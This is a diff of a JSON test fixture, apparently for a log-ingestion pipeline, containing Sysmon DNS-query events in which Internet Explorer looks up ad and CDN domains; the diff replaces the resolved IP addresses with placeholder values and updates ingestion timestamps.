@@ -14211,22 +14049,22 @@ "sc.iasds01.com" ], "ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313918221Z", + "ingested": "2021-12-09T13:49:44.739773800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", 
@@ -14290,11 +14128,11 @@ "type": "CNAME" }, { - "data": "104.244.38.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14302,7 +14140,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14310,7 +14148,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14318,7 +14156,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14326,21 +14164,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -14356,22 +14194,22 @@ "dt.adsafeprotected.com" ], "ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313919537Z", + "ingested": "2021-12-09T13:49:44.739779500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14439,12 +14277,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -14461,13 +14299,13 @@ "status.thawte.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313920911Z", + "ingested": "2021-12-09T13:49:44.739785400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", 
@@ -14546,47 +14384,47 @@ "type": "CNAME" }, { - "data": "38.134.110.101", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.143", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.177", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.104", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.114", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14604,20 +14442,13 @@ "ads.stickyadstv.com" ], "ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313922437Z", + "ingested": "2021-12-09T13:49:44.739790Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", 
@@ -14685,12 +14516,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { 
@@ -14707,13 +14538,13 @@ "hbx.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313923847Z", + "ingested": "2021-12-09T13:49:44.739793300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14777,27 +14608,27 @@ "type": "CNAME" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14813,16 +14644,13 @@ "match.taboola.com" ], "ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313925047Z", + "ingested": "2021-12-09T13:49:44.739798Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14886,17 +14714,17 @@ "type": "CNAME" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -14912,14 +14740,13 @@ "img-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313927154Z", + "ingested": "2021-12-09T13:49:44.739802900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 